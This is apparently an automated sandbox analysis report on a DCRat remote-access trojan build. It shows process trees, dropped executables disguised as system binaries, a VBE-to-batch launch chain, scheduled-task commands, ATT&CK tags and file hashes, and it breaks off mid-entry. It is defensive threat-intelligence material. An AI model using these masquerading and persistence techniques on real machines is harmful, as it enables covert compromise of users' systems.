    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6936 -childID 11 -isForBrowser -prefsHandle 4764 -prefMapHandle 6440 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4b0b3cf-c80c-4b8f-98ea-9530bfc39258} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:6348
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7264 -childID 12 -isForBrowser -prefsHandle 3988 -prefMapHandle 2500 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {58294120-f43f-47a0-a94f-ec0ef03fbed3} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:7112
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7416 -childID 13 -isForBrowser -prefsHandle 6552 -prefMapHandle 6724 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {86e919b0-5da0-4393-bcec-26b3470a4ee1} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:4936
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7664 -childID 14 -isForBrowser -prefsHandle 6936 -prefMapHandle 5280 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d267b93-2f8d-43e7-8591-a413b9211ddb} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:7228
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5512 -childID 15 -isForBrowser -prefsHandle 7800 -prefMapHandle 7076 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3de00e0c-c896-4f3a-be9f-fcc601adb6ea} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:2460
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7792 -childID 16 -isForBrowser -prefsHandle 7728 -prefMapHandle 7136 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f5f1216-941c-47a4-bf2d-67cb8a76a3f4} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:1660
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7460 -childID 17 -isForBrowser -prefsHandle 4776 -prefMapHandle 5284 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd78f0e1-9dd3-4587-8dd9-352a1089a119} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:7544
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7344 -childID 18 -isForBrowser -prefsHandle 5380 -prefMapHandle 5416 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {181a6992-c054-48c5-a296-a6227b35e5b1} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:4024
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7972 -childID 19 -isForBrowser -prefsHandle 6672 -prefMapHandle 6904 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {68a43c32-7e70-4a0c-83b6-95c35b350d1c} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:7992
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6640 -childID 20 -isForBrowser -prefsHandle 3988 -prefMapHandle 7980 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {03571c78-576d-4349-a01d-e81c9ef9b827} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:6092
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5412 -childID 21 -isForBrowser -prefsHandle 7824 -prefMapHandle 5376 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c73800fc-119f-448c-9dee-7176b7905e28} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:2332
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7452 -childID 22 -isForBrowser -prefsHandle 6068 -prefMapHandle 6072 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75d060f6-4b8f-4d93-9cf8-10c71bee148e} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:1704
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8320 -childID 23 -isForBrowser -prefsHandle 8348 -prefMapHandle 8344 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1887e04-4e7d-4713-92a0-bb3ba5cf6852} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:3992
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7372 -childID 24 -isForBrowser -prefsHandle 5488 -prefMapHandle 7924 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e630a730-c104-497b-8bf0-060f98029c23} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:2932
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8448 -childID 25 -isForBrowser -prefsHandle 6924 -prefMapHandle 3344 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {06260e01-46bc-402a-a345-c4577f5805ef} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:7552
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8236 -childID 26 -isForBrowser -prefsHandle 7544 -prefMapHandle 7648 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {96513974-80bc-4fb5-98ee-5d47ee3ddc48} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:2736
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6476 -childID 27 -isForBrowser -prefsHandle 7156 -prefMapHandle 4184 -prefsLen 30408 -prefMapSize 245341 -jsInitHandle 1036 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc1e09c4-f717-4ad2-80eb-d4c4f776ed1d} 3368 "\\.\pipe\gecko-crash-server-pipe.3368" tab
    3⤵
    PID:3672

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:2412

C:\Program Files\dotnet\unsecapp.exe
"C:\Program Files\dotnet\unsecapp.exe"
1⤵
- Executes dropped EXE
PID:5832

C:\Program Files\Windows Photo Viewer\services.exe
"C:\Program Files\Windows Photo Viewer\services.exe"
1⤵
- Executes dropped EXE
PID:6692

C:\surrogatecontainerWebreviewSvc\RuntimeBroker.exe
C:\surrogatecontainerWebreviewSvc\RuntimeBroker.exe
1⤵
- Executes dropped EXE
PID:8136

C:\surrogatecontainerWebreviewSvc\conhost.exe
C:\surrogatecontainerWebreviewSvc\conhost.exe
1⤵
- Executes dropped EXE
PID:6276

C:\Users\Admin\Searches\lsass.exe
C:\Users\Admin\Searches\lsass.exe
1⤵
- Executes dropped EXE
PID:6996

C:\Program Files\dotnet\unsecapp.exe
"C:\Program Files\dotnet\unsecapp.exe"
1⤵
- Executes dropped EXE
PID:7896

C:\Windows\bcastdvr\WmiPrvSE.exe
C:\Windows\bcastdvr\WmiPrvSE.exe
1⤵
- Executes dropped EXE
PID:6764

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "blockwinref" /f
1⤵
- Process spawned unexpected child process
PID:1608

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "blockwinrefb" /f
1⤵
- Process spawned unexpected child process
PID:7348

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "dwm" /f
1⤵
- Process spawned unexpected child process
PID:6976

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "dwmd" /f
1⤵
- Process spawned unexpected child process
PID:5244

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "conhost" /f
1⤵
- Process spawned unexpected child process
PID:2980

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "conhostc" /f
1⤵
- Process spawned unexpected child process
PID:6692

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "blockwinref" /f
1⤵
- Process spawned unexpected child process
PID:7920

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "blockwinrefb" /f
1⤵
- Process spawned unexpected child process
PID:4032

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "unsecapp" /f
1⤵
- Process spawned unexpected child process
PID:5552

C:\Windows\Offline Web Pages\backgroundTaskHost.exe
"C:\Windows\Offline Web Pages\backgroundTaskHost.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:7720

C:\Program Files\Windows Photo Viewer\services.exe
"C:\Program Files\Windows Photo Viewer\services.exe"
1⤵
- Executes dropped EXE
PID:4264

C:\surrogatecontainerWebreviewSvc\RuntimeBroker.exe
C:\surrogatecontainerWebreviewSvc\RuntimeBroker.exe
1⤵
- Executes dropped EXE
PID:4844

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "unsecappu" /f
1⤵
- Process spawned unexpected child process
PID:5296

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "lsass" /f
1⤵
- Process spawned unexpected child process
PID:3160

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "lsassl" /f
1⤵
- Process spawned unexpected child process
PID:4972

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "WmiPrvSE" /f
1⤵
- Process spawned unexpected child process
PID:6388

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "WmiPrvSEW" /f
1⤵
- Process spawned unexpected child process
PID:1400

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "csrss" /f
1⤵
- Process spawned unexpected child process
PID:6812

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "csrssc" /f
1⤵
- Process spawned unexpected child process
PID:7064

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "services" /f
1⤵
- Process spawned unexpected child process
PID:7156

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "servicess" /f
1⤵
- Process spawned unexpected child process
PID:1472

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "RuntimeBroker" /f
1⤵
- Process spawned unexpected child process
PID:4924

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "RuntimeBrokerR" /f
1⤵
- Process spawned unexpected child process
PID:3916

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "conhost" /f
1⤵
- Process spawned unexpected child process
PID:2224

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "conhostc" /f
1⤵
- Process spawned unexpected child process
PID:6636

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "backgroundTaskHost" /f
1⤵
- Process spawned unexpected child process
PID:4180

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "backgroundTaskHostb" /f
1⤵
- Process spawned unexpected child process
PID:6020

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "backgroundTaskHost" /f
1⤵
- Process spawned unexpected child process
PID:2632

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "backgroundTaskHostb" /f
1⤵
- Process spawned unexpected child process
PID:5712

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "dwm" /f
1⤵
- Process spawned unexpected child process
PID:6760

C:\Windows\system32\schtasks.exe
schtasks.exe /delete /tn "dwmd" /f
1⤵
- Process spawned unexpected child process
PID:2896

C:\Users\Admin\Desktop\DCRatBuild.exe
"C:\Users\Admin\Desktop\DCRatBuild.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5508
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\surrogatecontainerWebreviewSvc\XtpSHpC7f961Cu.vbe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\surrogatecontainerWebreviewSvc\dzIBKjLNvS.bat" "
    3⤵
    PID:1856
  - - C:\surrogatecontainerWebreviewSvc\blockwinref.exe
      "C:\surrogatecontainerWebreviewSvc\blockwinref.exe"
      4⤵
      PID:5492

C:\Users\Admin\Desktop\DCRatBuild.exe
"C:\Users\Admin\Desktop\DCRatBuild.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7396
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\surrogatecontainerWebreviewSvc\XtpSHpC7f961Cu.vbe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\surrogatecontainerWebreviewSvc\dzIBKjLNvS.bat" "
    3⤵
    PID:2012
  - - C:\surrogatecontainerWebreviewSvc\blockwinref.exe
      "C:\surrogatecontainerWebreviewSvc\blockwinref.exe"
      4⤵
      PID:4892

C:\Users\Admin\Desktop\DCRatBuild.exe
"C:\Users\Admin\Desktop\DCRatBuild.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5368
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\surrogatecontainerWebreviewSvc\XtpSHpC7f961Cu.vbe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\surrogatecontainerWebreviewSvc\dzIBKjLNvS.bat" "
    3⤵
    PID:5864
  - - C:\surrogatecontainerWebreviewSvc\blockwinref.exe
      "C:\surrogatecontainerWebreviewSvc\blockwinref.exe"
      4⤵
      PID:7672

C:\Users\Admin\Desktop\DCRatBuild.exe
"C:\Users\Admin\Desktop\DCRatBuild.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4800
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\surrogatecontainerWebreviewSvc\XtpSHpC7f961Cu.vbe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\surrogatecontainerWebreviewSvc\dzIBKjLNvS.bat" "
    3⤵
    PID:1632
  - - C:\surrogatecontainerWebreviewSvc\blockwinref.exe
      "C:\surrogatecontainerWebreviewSvc\blockwinref.exe"
      4⤵
      PID:7932

C:\Users\Admin\Desktop\DCRatBuild.exe
"C:\Users\Admin\Desktop\DCRatBuild.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7624
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\surrogatecontainerWebreviewSvc\XtpSHpC7f961Cu.vbe"
  2⤵
  PID:2068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\surrogatecontainerWebreviewSvc\dzIBKjLNvS.bat" "
    3⤵
    PID:1868
  - - C:\surrogatecontainerWebreviewSvc\blockwinref.exe
      "C:\surrogatecontainerWebreviewSvc\blockwinref.exe"
      4⤵
      PID:7148

C:\Users\Admin\Desktop\DCRatBuild.exe
"C:\Users\Admin\Desktop\DCRatBuild.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2604
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\surrogatecontainerWebreviewSvc\XtpSHpC7f961Cu.vbe"
  2⤵
  PID:2320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\surrogatecontainerWebreviewSvc\dzIBKjLNvS.bat" "
    3⤵
    PID:6684
  - - C:\surrogatecontainerWebreviewSvc\blockwinref.exe
      "C:\surrogatecontainerWebreviewSvc\blockwinref.exe"
      4⤵
      PID:7988

C:\Users\Admin\Desktop\DCRatBuild.exe
"C:\Users\Admin\Desktop\DCRatBuild.exe"
1⤵
PID:3780
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\surrogatecontainerWebreviewSvc\XtpSHpC7f961Cu.vbe"
  2⤵
  PID:4204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\surrogatecontainerWebreviewSvc\dzIBKjLNvS.bat" "
    3⤵
    PID:6976
  - - C:\surrogatecontainerWebreviewSvc\blockwinref.exe
      "C:\surrogatecontainerWebreviewSvc\blockwinref.exe"
      4⤵
      PID:676

C:\Users\Admin\Desktop\DCRatBuild.exe
"C:\Users\Admin\Desktop\DCRatBuild.exe"
1⤵
PID:7324
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\surrogatecontainerWebreviewSvc\XtpSHpC7f961Cu.vbe"
  2⤵
  PID:5984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\surrogatecontainerWebreviewSvc\dzIBKjLNvS.bat" "
    3⤵
    PID:7348
  - - C:\surrogatecontainerWebreviewSvc\blockwinref.exe
      "C:\surrogatecontainerWebreviewSvc\blockwinref.exe"
      4⤵
      PID:5688

C:\Users\Admin\Desktop\DCRatBuild.exe
"C:\Users\Admin\Desktop\DCRatBuild.exe"
1⤵
PID:2412
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\surrogatecontainerWebreviewSvc\XtpSHpC7f961Cu.vbe"
  2⤵
  PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\surrogatecontainerWebreviewSvc\dzIBKjLNvS.bat" "
    3⤵
    PID:5744
  - - C:\surrogatecontainerWebreviewSvc\blockwinref.exe
      "C:\surrogatecontainerWebreviewSvc\blockwinref.exe"
      4⤵
      PID:5928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\lsass.exe.log

Filesize
1KB

MD5
b4e91d2e5f40d5e2586a86cf3bb4df24

SHA1
31920b3a41aa4400d4a0230a7622848789b38672

SHA256
5d8af3c7519874ed42a0d74ee559ae30d9cc6930aef213079347e2b47092c210

SHA512
968751b79a98961f145de48d425ea820fd1875bae79a725adf35fc8f4706c103ee0c7babd4838166d8a0dda9fbce3728c0265a04c4b37f335ec4eaa110a2b319

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\activity-stream.discovery_stream.json

Filesize
21KB

MD5
cd27c1f650386ad24be4a5c1d67df983

SHA1
c5eebe998d71bd831f54c894c6470ad3e0ebf825

SHA256
2af36b2b93d7b4149cd65889a22e7ff12776479e7847cbd449b1dcc19420b542

SHA512
c237948581261ce902099a419ee366f4f87f72fa9e635bf64da4261be431cf6303fc8f455b5d6fe6a275c0dd84194f0dce155fdf139b075e16998eacd03f57c3

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\doomed\1288

Filesize
39KB

MD5
a3d295b84002ec707b9f6bf8782b3afc

SHA1
ffb97ddb5a5734c47123d59752bb63ef1ca29fcd

SHA256
c4d6e6f9b4f5ad24b300ded02549a863c72bb3e693ba38a3e391a487f96edec8

SHA512
2ee2d4dfb77cf21ad636524f44077ea12ef27726ea93033031cfff5f0d7d7dbb44be2fa788cbb331495661a8df16c987e5da643be9a08fc847a32b7f89507b94

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\doomed\20096

Filesize
75KB

MD5
580373c2ea5aab5c26c4ad5078304ef6

SHA1
525fba070ddeefa7a5bb28b062824ed366da9003

SHA256
ddb80f242af01385edebcae7214ccd4604612794651672d245223bc892acaa81

SHA512
d2fb8c9f76127579c47da834b2216f171e61cedfcc2992b72869771d878477bd2a81fe2331ec04d1a15a257c4c2e32356e13ecd13e457b81e5abb239e5b220dc

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\02D36417E76EAE7E219AFD89F4B8724DCAB41983

Filesize
163KB

MD5
2a600e15fe9b7efd678dd3d81d0ba837

SHA1
50494150399eaf77144d95aa516e946da4f72283

SHA256
509524849b97003f89092fe0302b805bb2444b263fb4119df19964014e0e0564

SHA512
d83858cb00718fb137bbb829896bc7a365337492fd38db1ee7f373c23131d6ed03a7a702a76c05b1932792af8a2d9d0ee7701ae254b278d0ae3de01ed1b144c8

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\0305BF7FE660AF5F32B4319E4C7EF7A7B70257A3

Filesize
13KB

MD5
7b1d113dd04bf45dc5265296fb7853cf

SHA1
792d2832c4d459f0a10366debcd4c23fa6bcb3d4

SHA256
86ac6eb4c21b320b9c6134f7cf45c872de799b8227dab2627ebbd86ac9063d79

SHA512
e76e3edba601d0dd0069f576d1405d226020d474329368bdff998e708bf7bb132ece57e9429d86cb5b8bb22b8a22d4ea5ac05261bf5038fddd1440d85b5bb84d

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\0305BF7FE660AF5F32B4319E4C7EF7A7B70257A3

Filesize
13KB

MD5
2de2d13945a7af213a330fb98a1a4c4a

SHA1
a4788e283ec8fff049630d4ae4c348cb8f75a1fa

SHA256
43c428e774b6d9cee64732165ee0adf672947a04d19f95873cabaab13075e1db

SHA512
bbe8d4f0174661d7733029e0655104b08b1bb66bbc3cf32944a4d1fa9f136ba75059416431aeaceafdc69c4f0017ac247b404175a2d7b96eac4ecf6f8e1df210

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\04E319E7AC593017F1613D5C59EE8B3021394B90

Filesize
96KB

MD5
90509b709f07652c5cbc1e27a2c5c4d0

SHA1
1fd4124815be8ea2d1c29587e014be2b18b8d361

SHA256
611827f45637a3d5bff9961ae51766765d16060fa360c909c3874e0d297816a6

SHA512
8eb5d0c91131ec7d19cba5f0ac253048a0d71bf5b40714bd71feaa4ba006437f99d763bea8d925937d3f44fdf7c2efbe1ca536a6963e4c3f1bcb1f9d5b038d6a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\077B603FAD6F371C7D19AC3776FEC44EB70803B3

Filesize
13KB

MD5
1149d41b8b5f5e40454dfd30d6be578f

SHA1
ae4dc60fe0b4b609b62fa63e1a3dfcf6d04d2ab2

SHA256
db9adcab45e87b08a450c80964a4b2c7784c0a1351b81eab4f500946c510f8b7

SHA512
26e8aa9028a4113a8c6009ccf85385fbb03b81697b7ec3c437a4f45259eb415ac770497dea30280a39253f2acdd7304834c3555aed95ded25a57b60dc32ebf04

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\09371402FA57E30B59C3DC86FCDB4F57E592394C

Filesize
93KB

MD5
6c15a8a5424dba292dbda105f9ec181b

SHA1
62ad92954736f914c916c2eecd8e108d20a5819e

SHA256
ce499bc149da7d993d1ab6870e6b8a2a83499772bdd7d2a5da94637fc756adb3

SHA512
b7e4f3bcd52af2a29c8ce7cac9f6a0e4fe8ea5f8fb1c90ec92d090e2bfe7bf6bd307e3b0f32934ca82b2229d37a61283b5e3d71d575421f1276aaee9b4cb4e6f

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\0B0868716B132810E44C75BDE77F900D2DB112A2

Filesize
25KB

MD5
5e369c4c7002a25f127d99b066f2d7a3

SHA1
17c3550bfdb57c50c65407df94b0e769018d0271

SHA256
d16a595de44ca74ec44dbc5858bc58522355f985d450cf05f84e868e31f8cde5

SHA512
c36d629f0d5ccc2d3a3d046dc7f41ca4fb66d3fa1f4e14e4dd0379a0d073bd3a1069c6f2656ac8280f39b85881440bb40d056785a11f222e8b6896c126ec9c11

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\0C7D4C999F67C32890A50E816E010967BD01D1A1

Filesize
13KB

MD5
7e4e42d6aa91501c54c330084c37bdd1

SHA1
b0b2d9bab9195c21dc8f85855f6d20942c9abaef

SHA256
d12c533f9750ef4dfb6e582718be81eecd0aee63324ffe542733104282943fc0

SHA512
2bb5c56cb8f0f00ecb8478eb4f956d2e06f3b41a7f8baf94edaf9ede8c019a9a539164c7adc5437ab67b8547d71bad58871905d1206e36cbbaff50765beaeb0f

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\0E610968FF7555E2BCF2C8FF9ADECA90C7AE8635

Filesize
94KB

MD5
99df120f38d847a375edf669257748a8

SHA1
28cc0078b98becc9b46eec5574cd51ed5d96ea1d

SHA256
074b3caa2dd5107f040d25e7f020bf21fb12a574541b2eb5751aba68d657d8d9

SHA512
72f6ead5127f576fe6bf1f5bbcacabea6c861aa42700a045095b70db481a82cf64fd94143c75188395eb36ca93df48c2b0abaea71ce687e9eb78369ff9c92149

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\0ECF53636AA87A232CB871EE7CCBD95C17EAA2D4

Filesize
111KB

MD5
b2c43032628dd6397c4789e33ffb1a36

SHA1
9d7e1c3cd751279e23e02979ec33ae576ba35778

SHA256
ecb2e71c734959a0dc78aa589e1465df6e391ab2a2251c14b0b49cf268c5e95f

SHA512
589f26f549e0add30a6809597efd7a8457cdc9ef176fb579adfd005125b28d086b49debc7e8a38ddf057dd89e1d7066039590a1a9754d70509e3e2d1ffadf8d7

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\181D82F61CCC653720DF95C65FCEC0AB6791B3AC

Filesize
